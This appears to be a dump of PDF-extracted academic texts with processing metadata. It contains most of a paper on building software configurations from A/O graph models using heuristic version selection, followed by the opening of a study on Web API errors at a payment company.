Figure 1 can be expressed by an $A/O$ graph in Figure 2. For simplicity variants are given names which are derived from the name of the corresponding family of software components by suffixing it with a natural number. \begin{center} \includegraphics[width=\textwidth]{example_graph.png} \end{center} Figure 2: Model of the software system from Figure 1 represented as an $A/O$ graph. Let $FAMILY_S$ be a set of families of software components, $VARIANT_S$ be a set of variants of a software system $S$. Let $F$ be a set of names and $f_{name}: FAMILY_S \to F$ an injective function which assigns a unique name to each family of a software system $S$. Let $A \subseteq VARIANT_S \times F$ be a binary relation defined as $$ e_1 A e_2 \iff \exists x \forall r(x \in e_1 \land r \in x. ArchRel \land r.FamilyId = e_2) $$ Let $O \subseteq F \times VARIANT_S$ be a binary relation defined as: $$ e_1 O e_2 \iff e_2 \subseteq f_{name}^{-1}(e_1). $$ We define a model of a software system $S$ to be an oriented graph $M_S = (N, E)$, where $N = F_S \cup \text{VARIANT}_S$ is a set of nodes with $F_S = \{ x \mid x \in F \land \text{fnname}_S(x) \in \text{FAMILY}_S \}$, and $E = A \cup O$ is a set of edges such that every maximal connected subgraph has at least one root. We remark that binary relation $A$ represents architectural relations and relation $O$ mirrors has_variant relation. The requirement that a model of a software system should have at least one root is motivated by the fact that the model should serve the purpose of building of a software system configuration. When there is no root in a model, it is not possible to determine which components are to be selected for a configuration. Actually, the requirement is not a restriction in case of software systems. This follows from the very nature of the development of a software system and its description by transformations of solution states. Let us mention that the known approaches to modelling a software system by a graph all assume there is at least one root, cf. [15, 20, 14, 6]. 3 Specifying a configuration Taking into account the fact that nodes in our model are component families and variants, but not revisions (i.e., the actual software components), it follows from it that any configuration we build by searching the model can only be a generic one. It can identify several configurations of the software system. A configuration of a software system built solely from software components, i.e. revisions, is called a bound one. A generic configuration consists from variants and it determines a set of bound configurations [5]. To build a concrete (bound) configuration from a generic one, one revision for each variant in the generic configuration must be selected. Let $M = (N, E)$ be a model of a software system. We take a subgraph $G_M = (U, H)$ of $M$, where $U \subseteq N, H \subseteq E$, such that each $O$-node (i.e. family) has exactly one successor in it, $U$ includes at least one $O$-node (i.e. family) and at least one $A$-node (i.e. variant) and call it a generic configuration for $M$. We take a set of software components such that for each variant included in the generic configuration $G_M$ there is at most one revision (i.e., a software component) in it and call it a bound configuration $B_{G_M}$. Requirements specifying a configuration determine which components are admissible for the configuration. Requirements specification is an important phase of the process of configuration building. The quality of the configuration largely depends on the requirements and on how they are actually used in the building process. Our approach to building the configuration is based on a model of a software system represented as an $A/O$ graph. The requirements influence the subgraph derived from it, i.e. the generic configuration, as well as selection of a revision for each variant, i.e. consequently forming the bound configuration. The configuration requirements can be classified as: - requirements related to properties of components viewed from the point of view of the whole system, i.e. which components (families of them) are to be considered when building the configuration, - requirements on version selection. The first group is specified by: - a set of names of architectural relations (represented by edges originating in $\text{A}$-nodes), which will serve to integrate $\text{A}$-nodes of the system, - a condition for selection of exported components (represented for instance by a logic expression referring to component attributes). The requirement for version selection is expressed as a sequence of heuristic functions which reduce the set of suitable versions. The heuristic functions represent knowledge about the degree of suitability of the respective versions. We adopted a widespread approach to identify versions of components by the use of attributes [13, 5, 28]. The heuristic functions refer to properties of versions as defined by their attributes. We can express the relative importance of a given evaluating criterion by modifying the order in which the heuristic functions are applied. We have distributed the requirements for version selection into two parts: - a necessary selection condition, which must be satisfied by every version selected as a potential candidate. The condition can be expressed by a heuristic function which maps a set of all versions into a set of admissible versions. - a suitability selection condition, which is used in step by step reduction of the set of admissible versions aiming to select a single version. The condition is represented by heuristic functions $h_1, h_2, \ldots, h_n$. In order to build a configuration which would meet the requirements, our method builds a generic configuration first and then proceeds to building a bound one. We distributed configuration requirements to two parts: the generic configuration requirement and the bound configuration requirement. We shall write the generic configuration requirement as a triple: $$\text{gcr}_M = (\text{Rel}, \text{VariantCond}, \text{ConfConstr})$$ where $\text{Rel}$ is a set of names of architectural relations, $\text{VariantCond}$ is a set each element of which consists of three parts: family specification, necessary condition for variant selection and suitability condition for variant selection. \textit{ConfConstr} is an expression (built up from references to heuristic functions) specifying constraint for all components to be included in the configuration. A possible example of the generic configuration requirement is: \[ gcr_M = (\{\text{contains, uses, decomp_from}\}, \] \[ \{(\star, \text{operating system} = \text{DOS} \land \text{communication language} = \text{Slovak}, \] \[ \text{progr_language} = \text{Prolog}, \] \[ \text{prefer version with a greater number of definite attributes}, \] \[ \text{prefer version with a smaller number of defined architectural relations to other components }\}], \] \[ \neg(\text{progr_language}(x) = \text{Prolog} \land \text{progr_language}(y) = \text{Pascal})). \] Let us note that in the example, requirements for variant selection are the same for all families in the software system (denoted as '**)). We shall write the bound configuration requirement as a pair: \[ bcr_M = (\text{ExpCond}, \text{RevisionCond}), \] where \text{ExpCond} is an expression specifying a condition for selection of exported components, and \text{RevisionCond} is a set each element of which consists of two parts: family specification and suitability condition for revision selection. A possible example of the bound configuration requirement is: \[ bcr_M = (\text{true}, [\text{author} = \text{maria}, \text{date } \leq 17.6.94, \text{state } = \text{tested}]). \] \section{Method for building a configuration} We understand, in accordance with most of the literature, the notion of software system configuration to be a set of components which is complete, consistent and satisfying the required properties. In our terminology, this corresponds to the notion of bound configuration. Our approach is based on an assumption that all software components which can be possibly needed in the process of configuration building are available. However, having in mind the fact that the activities of configuration building and using [2, 6] can be separated, the above assumption is not a real restriction. Our method of building a software system configuration makes use of some ideas from previous works, especially those of [11, 25, 18, 2, 6, 1]. The method describes a procedure how to find the set of components included in the bound configuration. During the course of procedure application, a generic configuration is to be formed. This product can be used when a change of the software system is attempted. Reusing it frees us from the necessity of creating the configuration from the scratch next time. Now we preview the main points of our method for building a configuration. In order to build a configuration which would meet the requirements, our method takes into account knowledge about the architectural relations between components and also about selecting components. The method must cope with three important tasks. First subtask is to determine which component families shall be considered in building the configuration. Selection of component families is based on edges originating in $A$-nodes and on component selection condition (exported components condition). In selection of considered component families, there is selected a subgraph from the system model such that only edges representing relations specified in configuration requirement form it. The exported components selection is performed after completing the second task. Removing of nodes which do not satisfy the exported components condition can cause removing their successors which have to be considered. Second subtask is to search this subgraph in such a way that for each $A$-node all successors are selected and for each $O$-node exactly one successor is selected. A successor to $O$-node (i.e., a family) is its variant. A problem arises here in those cases when either there are more than one variant satisfying the requirements, or there is no such variant at all. The problem resembles kinds of problems which are being tackled by artificial intelligence techniques. In evaluating suitability of possible alternatives of the solution, a heuristic information is used. It can be expressed e.g. in form of a heuristic function which assigns to each alternative a value from some well ordered set. The value estimates how suitable or promising it is to select the given alternative in the actual state. In the case of software component selection, it is difficult to express a heuristic function which would define an ordering of versions based on their suitability. There must be taken into account various aspects, such as what kind of software system is being built, what are the requirements and properties of versions. The aspects should be assigned weights according to their relative importance. We have found it more advantageous not to attempt to order the versions according to their suitability, but rather to delete step by step those least suitable from the set of all possible versions [16]. We understand the strategy of version selection to be based on a sequence of heuristic functions which reduce the set of suitable versions as identified by the software component family. Heuristic functions are evaluated in two steps: (1) applying the necessary selection condition and (2) applying suitability selection condition. Finally, third subtask is to select a set of revisions, i.e. a set of components which form the bound configuration. Here, for each variant from a generic configuration, a suitable revision must be selected according to requirements for revision selection. Method for selecting the most suitable revision is in fact similar to the above one for selecting most suitable variants. An overall scheme of our method is in Figure 3. Detail specification of the method is put in the Appendix. The above description of the method specifies in fact only what is to be achieved in the respective steps. How this can be done shall now be presented for each of the principal steps of our method. 4.1 Forming the subgraph In the step 1.1, a subgraph of the system's model $M$ is to be formed in such a way that all its $A$-edges shall represent only relations indicated in $gcr_M.Rel$. The task can be described as searching the graph $M$ from its roots and selecting exclusively such edges and nodes which satisfy the condition stated in 1.1. The algorithm uses two data structures which we denote as $CLOSED$ (listing all such nodes all the successors of which have been processed already) and OPEN (listing all such nodes that only their predecessors, but not successors have been processed yet). Both CLOSED and OPEN list the nodes along with pointers to their respective predecessors which are useful in forming the resulting graph $F$. Therefore CLOSED and OPEN are both sets of elements which are pairs $(Node, Pred)$, where $Node \in N$, $Pred \subseteq N$. **Input:** model $M = (N, E)$ of the software system, a generic configuration requirement $gcr_M$ for the model $M$. **Output:** graph $F = (FN, FE)$ 1. Push the roots of the graph $M$ into the set OPEN. Initialize CLOSED to an empty set: $$OPEN \leftarrow \{ (x, \{\}) \mid x \in N \land \neg (\exists y((y, x) \in E)) \}$$ $$CLOSED \leftarrow \{ \}$$ 2. if OPEN is empty then halt, with the sets $FN$ and $FE$ formed as follows: $$FN = \{ x \mid \exists u(u \in CLOSED \land u.Node = x) \}$$ $$FE = \{ (x, y) \mid \exists u(u \in CLOSED \land x \in u.Pred \land y = u.Node) \}$$ 3. $e \leftarrow$ the element selected from OPEN and delete the value of $e$ from OPEN 4. if $\exists p ((e.Node, p) \in CLOSED)$ then $(e.Node, p) \leftarrow (e.Node, p \cup e.Pred)$ (i.e. extend $p$ with a pointer back to $e.Pred$) and go to 2. 5. if $e.Node$ is a $A$-node in graph $M$ then for each successor $e.succ$ of $e.Node$ do: if $\exists k \exists r(k \in e.Node \land r \in k.ArchRel \land r.RelationId \in gcr_M.Rel \land r.FamilyId = e.succ)$ then push $(e.succ, \{e.Node\})$ into OPEN push $e$ into CLOSED and go to 2. 6. if $e.Node$ is an $O$-node in graph $M$ then for each successor $e.succ$ of $e.Node$ do: push $(e.succ, \{e.Node\})$ into OPEN push $e$ into CLOSED and go to 2. The result after applying the step 1.1 of the method to the model of the software system from the Figure 2 using a generic configuration requirement described in the section 3 is depicted on Figure 4. ![Figure 4: A/O graph after the step 1.1.](image) ### 4.2 Forming the generic configuration In the step 1.2 of the method, generic configuration $G_M$ is to be formed. Input to this step is the graph $F$ formed in the previous 1.1. Graph $G_M$ includes all the roots of $F$. It includes just one successor of each $O$-node of $F$ included in $G_M$. It includes all the successors of each $A$-node of $F$ included in $G_M$. Moreover, the nodes in $G_M$ must meet the constraints defined in the generic configuration requirement $gcr_M.ConfConstr$. The task can be described as searching an A/O graph $F$ starting from its roots and by selecting always nodes which satisfy the above conditions. However, the algorithm is not as simple as the similar one in 1.1. The reason is the additional condition that the graph, i.e. the set of nodes must be consistent with respect to given constraints. Further complication is due to the fact that the method of selecting the version used in finding the successor of an $O$-node can fail. As a consequence, there can occur the situation that the graph being formed is not consistent. It must be modified in that case. We have devised and implemented the method in a logic programming environment using techniques especially designed to cope with the challenge. More specifically, it is based on identifying the reason for a deadend. It is attempted to find a place in the graph where the search for an alternative solution should be resumed. The aim is to keep the number of visited nodes and number of performed consistency checks as small as possible. The technique of node marking is used as well [4]. The result after applying the step 1.2 of the method to the model of the software system from the Figure 2 is depicted on Figure 5. As was stated earlier, in the method for building a configuration step 1.2 exactly one successor to each $O$-node is selected by applying the method of version selection. Version selection is controlled by knowledge in form of heuristic functions which refer to properties of versions. ![Figure 5: Generic configuration built from A/O graph in Figure 4.](image) ### 4.3 Making provisions to include exported components In the step 2.1 of the method, the condition of exported components selection $bcr_M.ExpCond$ is applied. The condition is represented by a function which assigns to each software component value from $\{satisfies, does\_not\_satisfy\}$. The condition of exported components selection refers only to properties which are the same for all components included in the given variant (architectural relations and functional attributes). Therefore, it suffices to apply it to any one component for each variant from the generic configuration $G_M$. The algorithm implementing the method is described in the following way: **Input:** graph $G_M = (U, H)$ **Output:** set $VE$ 1. $VE \leftarrow \{\}$ 2. for each element $v \in U$: - if $v$ is $A$-node - then $k \leftarrow$ the element selected from $v$ and - if $bcr_M.ExpCond(k) = satisfies$ - then $VE \leftarrow VE \cup \{v\}$ Set of exported variants after applying the step 2.1 of the method to the generic configuration from the Figure 5 in the case the condition of exported components is set \textit{true} is: $$VE = \{ EVAL.3, ACTIONS.1, INTERR.3, MANAGER.1, INFER.2 \},$$ i.e. all the variants from the generic configuration. 4.4 Forming the bound configuration In the last step of the method of building the configuration, the bound configuration is formed by selecting a revision for each variant included in the set resulting from the step 2.1. The selection takes place according to the revision selection condition \(bcr_M.RevisionCond\). We apply our method of version selection accordingly. 5 Experimental evaluation The above described method has been implemented in Prolog language. The primary purpose of the implementation was to create a prototype system supporting the process of building software system configurations which would be suitable for experimenting. A logic formalism, like any declarative formalism in general, is an excellent tool to support browsing and reasoning about versions of objects, relationships and dependencies [10]. We have performed several kinds of experiments aiming at empirical evaluation of important properties of our method. For each kind, there were performed extensive tests, if fact thousands of them, to gather data allowing certain conclusions. One kind of experiments concerns the version selection algorithm, which is part of our method. When analyzing this algorithm, we concentrated on elementary heuristic functions applications, which are the most expensive operations. The empirical analysis shows that for larger numbers of filters, number of applications of filters does not depend on it for a given number of versions. An explanation for it could be that if the filters are at least "reasonably", or "sufficiently" selective, then they succeed to arrive at one selected version "sufficiently" early before the later scheduled (i.e., those with higher index \(i\)) filters ever become applicable. No matter how many more filters we include, they would never be applied. On the other hand, number of applications of filters linearly depends on the number of versions, as could be expected. Other kind of experiments concerns the algorithm for building the generic configuration. Essentially, it is a graph searching algorithm. It searches an \(A/O\) graph to find a solution which additionally satisfies given constraints. When comparing to the usual algorithm with chronological backtracking (CHB), our algorithm is based on two principal additional concepts. First, we have used a special version of the dependency-directed backtracking to resolve the deadend situation. It analyses the reasons of inconsistency at the deadend node and uses the results in deciding which is the most promising node to visit next. This algorithm is further enhanced by marking mechanism (RB) which allows recording and propagating results of the analysis of the current deadend node. Our experiments were aimed at analysing the proposed algorithm how effective it is in coping with backtracks. We randomly generated problems, i.e. A/O graphs, and applied both algorithms to them. Number of backtracks necessary when solving the problem is compared to number of backtracks of the usual chronological backtracking algorithm. By definition, the ratio is always 1 for CHB algorithm. An alternative measure can be the number of consistency checks performed during searching a particular graph. In fact, we have experimented with both of these measures. We report on results using the number of backtracks in this paper. Due to the space limitations, we omit results using the latter. However, there has been a strong similarity between them. In Figure 6 we can see how the number of backtracks (denoted as BACK) for the new proposed algorithm which allows recording and propagating results of the analysis of the current node (RB) depends on the number of backtracks for the basic algorithm with chronological backtracking (CHB). ![Figure 6: Number of backtracks for RB and CHB.](image) In absolute numbers, the results show that the number of backtracks by enhanced algorithm is less than the number of backtracks when performing the usual chronological backtracking for the same graph. The presented graph is based on results of searching about 9000 generated graphs with number of nodes equal to 500. The reason for not including experiments with higher numbers of nodes was that they are obviously more time consuming and we could not have afforded them with our relatively modest computing environment. On the other hand, we have tried some experiments with other values as well. Based on them, we feel supported in the claim that our results are representative regardless this value. 6 Conclusions The proposed techniques for configuration management have basis in the general principle behind our approach: to allow software engineers to express informations that can be interpreted by the tool that automates the support to software building. In the following, we summarize briefly the most important properties of the proposed method for building the software system configuration. The method integrates "good" properties of some of the known approaches and moreover, solves some of their weak points in an original way. We consider families to be equivalence classes. Variants are sets of components, i.e. revisions. Moreover, the architectural relations are defined between variants and families. In such a way, we allow to define various properties of particular variants with respect to architectural relations to other components. This is motivated by the fact that indeed in practice we often have different architectural relations for alternative representations of some solutions when developing a software system. Our approach to building a configuration is to allow for explicit specification of knowledge leading to constraining the model in such a way that only required components would be included in the configuration. This approach was used also in other systems, cf. [13, 6, 11]. What is different is the structure of knowledge (configuration requirements), its representation and interpretation. Another important feature of our method is that relations between components, as well as their attributes and constraints can be defined at the level where they actually occur, similarly to e.g. [6]. This supports also the process of forming the system's model, defining the components' interfaces, and, last but not least, writing the configuration requirements. In version selection, our approach offers to a software engineer a framework for specifying various heuristics describing which versions are to be preferred. Using heuristic functions not only makes the process potentially capable of building better configurations, but also documents preferences applied in selections. Our approach is similar to version selection in DSEE [11]. What is new is distribution the requirements for version selection into the necessary selection condition and the suitability selection condition and defining their interpretation. The distinction becomes important, e.g. in selecting variants. Most of the requirement conditions are in fact just recommendations, so they can be formulated as suitability selection conditions. However, there are often certain requirements which must not be ignored, so they are formulated as necessary selection condition. Important is the fact that our method for version selection can fail to select the most suitable version automatically. This means complication to automation of configuration building but reflects more adequately software development needs. Main strengths of our approach to configuration building are (1) consideration of the conceptual distinction between variants and revisions, (2) consideration of architectural relations at the variant level and (3) distribution of requirements to several parts (a condition for selection of exported components and a set of names of architectural relations). To the best of our knowledge only system ADELE [5] allows consideration of a subset of defined architectural relations in a system model but no condition for selection of exported components. Other approaches simply consider all parts defined in a system model. Our modelling a software system is limited by the fact that every change of functional properties in software component development results in a new variant regardless to the real nature of the change. Similar limitation has the system ADELE, cf. [6]. The area of software configuration building requires further research. Our method assumes the components are available in the moment the configuration is built. We did not tackle the problem of effective forming of the derived components in response to changes. Another open problem is acquiring programming and problem knowledge on the suitability of component versions. In cases when attributes of components are not known no matter for what reason, methods of reverse engineering could be attempted to supply them. The proposed method could be incorporated into a CASE tool. The CASE tool, however, would have to support preserving and maintaining versions of software components. Here, the proposed model is to be used. Appendix Specification of the method for building a configuration **Input** to the method is: - a software system model $M = (N, E)$ with roots $s_1, s_2, \ldots, s_m$, - a generic configuration requirement $gcr_M = (Rel, VariantCond, ConfConstr)$, - a bound configuration requirement $bcr_M = (ExpCond, RevisionCond)$. **Output** from the method is: - a generic configuration $G_M$ for the given model, and - a bound configuration $B_{G_M}$ relative to the generic configuration, or - failure. 1. **Forming a generic configuration** 1.1. **Input**: software system model $M = (N, E)$, and generic configuration requirement $gcr_M$ **Output**: a graph $F = (FN, FE)$, where $FN \subseteq N$, $FE \subseteq E$ and the following holds: $$\forall i(i \geq 1 \land i \leq m) \Rightarrow s_i \in FN) \land$$ $$\forall n_1(n_1 \in FN \land (n_1 \text{ is O-node})) \Rightarrow$$ $$\forall n_2((n_2 \in N \land (n_1, n_2) \in E) \Rightarrow (n_2 \in FN \land (n_1, n_2) \in FE)) \land$$ $$\forall n_1((n_1 \in FN \land (n_1 \text{ is A-node})) \Rightarrow$$ $$\forall n_2((n_2 \in N \land (n_1, n_2) \in E) \land$$ $$\exists k \exists r(k \in n_1 \land r \in k.ArchRel \land r.RelationId \in gcr_M.Rel \land$$ $$r.FamilyId = n_2) \Rightarrow (n_2 \in FN \land (n_1, n_2) \in FE)) \land$$ $$\forall n(n \in FN \Rightarrow \exists i(s_i \in FE^+ n))$$. 1.2. **Input**: a graph $F = (FN, FE)$ formed in step 1.1, with roots $s_{F1}, s_{F2}, \ldots, s_{FM}$ generic configuration requirement $gcr_M$ **Output**: generic configuration $G_M = (U, H)$, where $U \subseteq FN, H \subseteq FE$ and the following holds: $$\forall i((i \geq 1 \land i \leq m) \Rightarrow s_{Fi} \in U) \land$$ $$\forall n_1((n_1 \in U \land (n_1 \text{ is O-node})) \Rightarrow \exists ! n_2((n_2 \in U \land (n_1, n_2) \in H)) \land$$ $$\forall n_1((n_1 \in U \land (n_1 \text{ is A-node})) \Rightarrow$$ $$\forall n_2((n_2 \in FN \land (n_1, n_2) \in FE) \Rightarrow (n_2 \in U \land (n_1, n_2) \in H)) \land$$ $$\forall n(n \in U \Rightarrow \exists i(s_{Fi} \in H^+ n)) \land$$ $gcr_M.ConfConstr(U) = U \land$ $$\forall n((n \in U \land (n \text{ is A-node}) \land \exists k(k \in n)) \Rightarrow k.Constr(U) = U)$, Exactly one successor to each $O$-node (i.e., family) included in the graph $G_M$ is selected by applying our method of version selection. The method of version selection for $O$-node $n$ is applied with following inputs: - set of versions $MU = \{x | x \in FN \land (n, x) \in FE\}$, i.e. variants included in the family represented by the node $n$ - version selection requirement, i.e. necessary condition for variant selection, suitability condition for variant selection taken from $gcr_M.VariantCond$. Output is the selected element from the set $MU$, i.e. a successor of the node $n$. 2. **Forming a bound configuration** 2.1. **Input:** generic configuration $G_M = (U, H)$ formed in step 1.2, bound configuration requirement $bcr_M$ **Output:** set of exported variants $VE$ such that the following holds: $$VE = \{v | v \in U \land (v \text{ is } A\text{-node}) \land \forall k(k \in v \Rightarrow bcr_M.ExpCond(k) = satisfies\}$$ 2.2. **Input:** set of exported variants $VE$ formed in step 2.1, bound configuration requirement $bcr_M$ **Output:** bound configuration, i.e. a set of software components $V$ such that the following holds: $$V = \{k \mid \forall v(v \in VE \Rightarrow \exists! k(k \in v))\},$$ where for each variant included in the set $VE$ exactly one component has been selected by applying the method of version selection. In this case, the method of version selection is applied for the variant $v$ with the following inputs: - set of versions in consideration $MU = \{k | k \in v\}$, i.e. revisions included in the variant represented by the node $v$ - version selection requirement, i.e. suitability condition for revision selection taken from $bcr_M.RevisionCond$. Output is the selected element from the set $MU$, i.e. the software component (revision) included in the variant $v$. References 15. K. Narayanaswamy and W. Scacchi, Maintaining configurations of evolving softwa-
{"Source-Url": "http://www2.fiit.stuba.sk/~navrat/publ/1999/seke.pdf", "len_cl100k_base": 10528, "olmocr-version": "0.1.50", "pdf-total-pages": 24, "total-fallback-pages": 0, "total-input-tokens": 62752, "total-output-tokens": 13260, "length": "2e13", "weborganizer": {"__label__adult": 0.0002684593200683594, "__label__art_design": 0.0002601146697998047, "__label__crime_law": 0.0002105236053466797, "__label__education_jobs": 0.0006246566772460938, "__label__entertainment": 3.4809112548828125e-05, "__label__fashion_beauty": 0.00010669231414794922, "__label__finance_business": 0.00012421607971191406, "__label__food_dining": 0.00023293495178222656, "__label__games": 0.0003998279571533203, "__label__hardware": 0.00044608116149902344, "__label__health": 0.00023555755615234375, "__label__history": 0.00013911724090576172, "__label__home_hobbies": 6.270408630371094e-05, "__label__industrial": 0.00017392635345458984, "__label__literature": 0.00018918514251708984, "__label__politics": 0.00013244152069091797, "__label__religion": 0.0002593994140625, "__label__science_tech": 0.0030364990234375, "__label__social_life": 5.9723854064941406e-05, "__label__software": 0.0060882568359375, "__label__software_dev": 0.986328125, "__label__sports_fitness": 0.00017786026000976562, "__label__transportation": 0.0002341270446777344, "__label__travel": 0.00014102458953857422}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 51851, 0.02008]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 51851, 0.72709]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 51851, 0.90506]], "google_gemma-3-12b-it_contains_pii": [[0, 301, false], [301, 1154, null], [1154, 4156, null], [4156, 6992, null], [6992, 9838, null], [9838, 12812, null], [12812, 14737, null], [14737, 16893, null], [16893, 19769, null], [19769, 22281, null], [22281, 25021, null], [25021, 28073, null], [28073, 28701, null], [28701, 30520, null], [30520, 32630, null], [32630, 33818, null], [33818, 36493, null], [36493, 38641, null], [38641, 41571, null], [41571, 43172, null], [43172, 45368, null], [45368, 47198, null], [47198, 49360, null], [49360, 51851, null]], "google_gemma-3-12b-it_is_public_document": [[0, 301, true], [301, 1154, null], [1154, 4156, null], [4156, 6992, null], [6992, 9838, null], [9838, 12812, null], [12812, 14737, null], [14737, 16893, null], [16893, 19769, null], [19769, 22281, null], [22281, 25021, null], [25021, 28073, null], [28073, 28701, null], [28701, 30520, null], [30520, 32630, null], [32630, 33818, null], [33818, 36493, null], [36493, 38641, null], [38641, 41571, null], [41571, 43172, null], [43172, 45368, null], [45368, 47198, null], [47198, 49360, null], [49360, 51851, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 51851, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 51851, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 51851, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 51851, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 51851, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 51851, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 51851, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 51851, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 51851, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 51851, null]], "pdf_page_numbers": [[0, 301, 1], [301, 1154, 2], [1154, 4156, 3], [4156, 6992, 4], [6992, 9838, 5], [9838, 12812, 6], [12812, 14737, 7], [14737, 16893, 8], [16893, 19769, 9], [19769, 22281, 10], [22281, 25021, 11], [25021, 28073, 12], [28073, 28701, 13], [28701, 30520, 14], [30520, 32630, 15], [32630, 33818, 16], [33818, 36493, 17], [36493, 38641, 18], [38641, 41571, 19], [41571, 43172, 20], [43172, 45368, 21], [45368, 47198, 22], [47198, 49360, 23], [49360, 51851, 24]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 51851, 0.0]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
34391c6563e900ec0e69ed494cd71ddfa4b603dc
[REMOVED]
{"Source-Url": "https://hal.archives-ouvertes.fr/hal-00341977/document", "len_cl100k_base": 14288, "olmocr-version": "0.1.53", "pdf-total-pages": 17, "total-fallback-pages": 0, "total-input-tokens": 74378, "total-output-tokens": 16896, "length": "2e13", "weborganizer": {"__label__adult": 0.00035953521728515625, "__label__art_design": 0.0006794929504394531, "__label__crime_law": 0.0003685951232910156, "__label__education_jobs": 0.0017442703247070312, "__label__entertainment": 0.00013780593872070312, "__label__fashion_beauty": 0.0002015829086303711, "__label__finance_business": 0.0008144378662109375, "__label__food_dining": 0.0003337860107421875, "__label__games": 0.0008020401000976562, "__label__hardware": 0.0029296875, "__label__health": 0.0005974769592285156, "__label__history": 0.0004763603210449219, "__label__home_hobbies": 0.0001423358917236328, "__label__industrial": 0.0007390975952148438, "__label__literature": 0.00051116943359375, "__label__politics": 0.00034165382385253906, "__label__religion": 0.0005364418029785156, "__label__science_tech": 0.200439453125, "__label__social_life": 0.0001143813133239746, "__label__software": 0.014984130859375, "__label__software_dev": 0.771484375, "__label__sports_fitness": 0.0002560615539550781, "__label__transportation": 0.0006918907165527344, "__label__travel": 0.00020313262939453125}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 53883, 0.01973]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 53883, 0.22269]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 53883, 0.79329]], "google_gemma-3-12b-it_contains_pii": [[0, 1023, false], [1023, 3256, null], [3256, 6778, null], [6778, 9784, null], [9784, 12815, null], [12815, 16963, null], [16963, 20511, null], [20511, 23331, null], [23331, 27267, null], [27267, 30731, null], [30731, 33803, null], [33803, 36362, null], [36362, 39879, null], [39879, 43880, null], [43880, 47166, null], [47166, 50376, null], [50376, 53883, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1023, true], [1023, 3256, null], [3256, 6778, null], [6778, 9784, null], [9784, 12815, null], [12815, 16963, null], [16963, 20511, null], [20511, 23331, null], [23331, 27267, null], [27267, 30731, null], [30731, 33803, null], [33803, 36362, null], [36362, 39879, null], [39879, 43880, null], [43880, 47166, null], [47166, 50376, null], [50376, 53883, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 53883, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 53883, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 53883, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 53883, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 53883, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 53883, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 53883, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 53883, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 53883, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 53883, null]], "pdf_page_numbers": [[0, 1023, 1], [1023, 3256, 2], [3256, 6778, 3], [6778, 9784, 4], [9784, 12815, 5], [12815, 16963, 6], [16963, 20511, 7], [20511, 23331, 8], [23331, 27267, 9], [27267, 30731, 10], [30731, 33803, 11], [33803, 36362, 12], [36362, 39879, 13], [39879, 43880, 14], [43880, 47166, 15], [47166, 50376, 16], [50376, 53883, 17]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 53883, 0.0]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
aa2e9f9267616ac6af693d0d5348244bb9df042c
An Exploratory Study on Faults in Web API Integration in a Large-Scale Payment Company Aué, Joop; Aniche, Maurício; Lobbezoo, Maikel; van Deursen, Arie DOI 10.1145/3183519.3183537 Publication date 2018 Document Version Accepted author manuscript Published in ICSE-SEIP '18: 40th International Conference on Software Engineering: Software Engineering in Practice Track Citation (APA) Important note To cite this publication, please use the final published version (if applicable). Please check the document version above. Copyright Other than for strictly personal use, it is not permitted to download, forward or distribute the text or part of it, without the consent of the author(s) and/or copyright holder(s), unless the work is under an open content license such as Creative Commons. Takedown policy Please contact us and provide details if you believe this document breaches copyrights. We will remove access to the work immediately and investigate your claim. An Exploratory Study on Faults in Web API Integration in a Large-Scale Payment Company Joop Aué1,2, Maurício Aniche2, Maikel Lobbezoo1, Arie van Deursen2 1Adyen B.V., 2Delft University of Technology {joop.aué,maikel.lobbezoo}@adyen.com,{m.f.aniche,arie.vandeursen}@tudelft.nl ABSTRACT Service-oriented architectures are more popular than ever, and increasingly companies and organizations depend on services offered through Web APIs. The capabilities and complexity of Web APIs differ from service to service, and therefore the impact of API errors varies. API problem cases related to Adyen’s payment service were found to have direct considerable impact on API consumer applications. With more than 60,000 daily API errors, the potential impact is enormous. In an effort to reduce the impact of API related problems, we analyze 2.43 million API error responses to identify the underlying faults. We quantify the occurrence of faults in terms of the frequency and impacted API consumers. We also challenge our quantitative results by means of a survey with 40 API consumers. Our results show 